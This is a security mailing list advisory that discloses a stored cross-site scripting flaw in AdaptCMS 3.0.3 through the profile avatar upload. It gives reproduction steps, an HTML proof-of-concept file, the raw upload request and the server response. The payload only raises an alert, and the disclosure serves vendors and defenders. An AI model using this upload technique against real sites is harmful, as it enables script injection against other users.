 
Full Disclosure mailing list archives
Stored XSS via File Upload - adaptcmsv3.0.3
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 1 Jun 2025 16:11:43 +0100
# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit "Profile" > "Edit Your Profile"
"Avatar"
2. Click on "Choose File" and upload the following file
html-xss.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
// HTTP POST request uploading the XSS file
POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0)
Gecko/20100101 Firefox/140.0
[...]
[...]
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[User][settings][avatar]";
filename="html-xss.html"
Content-Type: text/html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[_Token][fields]"
// HTTP Response
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 20:15:54 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 15400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
[...]
<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail
col-lg-2" alt="" /> <input type="hidden"
name="data[User][settings][old_avatar]" value="1_html-xss.html"
id="UserSettingsOldAvatar"/>    <div class="clearfix"></div>
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Stored XSS via File Upload - adaptcmsv3.0.3 Andrey Stoykov (Jun 03)


